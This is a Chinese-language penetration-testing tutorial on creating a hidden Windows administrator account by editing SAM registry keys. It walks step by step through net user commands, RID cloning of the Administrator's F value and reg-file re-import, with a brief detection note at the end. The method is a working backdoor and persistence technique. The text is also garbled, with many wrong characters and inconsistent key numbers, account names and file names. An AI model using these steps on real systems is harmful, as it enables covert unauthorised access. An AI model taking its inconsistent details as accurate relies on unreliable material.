渗透技巧——Windows系统的账户隐藏

渗透技巧——Windows系统的账户隐藏

2017-11-28-00:08:55

 0x01 账户隐藏的方法

该方法在网上已有相关资料，本节只作简单复现

测试系统：·Win7 x86/WinXP

一、对注册表赋予权限

默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改

如今须要为其添加管理员权限

右键-权限-选中Administrators，容许彻底控制，以下图：

从新启动注册表regedit.exe，得到对该键值的修改权限。

二、新建特殊账户

net user www$ 123456 /add
net localgroup administrators www$ /add

注：用户名要以$结尾

添加后，该账户可在必定条件下隐藏，输入net user没法获取，以下图：

可是，在控制面板可以发现该账户，以下图：

三、导出注册表

在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下找到新建的账户www$

获取默认类型为0x3eb

将注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\www$导出为1.reg

在注册表下可以找到对应类型名称的注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EB

以下图：

默认状况下，管理员账户Administrator对应的注册表键值为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

一样，右键将该键导出为3.reg:

将注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA下键F的值替换为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4下键F的值，即2.reg中键F的值替换成3.reg中键F的值替换后，以下图:

四、命令行删除特殊账户

net user test$ /del

五、导入reg文件

regedit /s 1.reg
regedit /s 2.reg

隐藏帐户制作完成，控制面板不存在账户www$

经过net user没法列出该账户

计算机管理-本地用户和组-用户也没法列出该账户

但可经过以下方式查看：

没法经过net user test$ /del删除该用户，提示用户不属于此组，以下图:

删除方法：

删除注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下对应账户的键值(共有两处)

注：工具HideAdmin能自动实现以上的建立和删除操做【此工具只适用于Win XP】

0x02 防护

针对隐藏账户的利用，查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\便可

固然，默认管理员权限没法查看，须要分配权限或是提高至Sytem权限

隐藏账户的登陆记录，可经过查看日志获取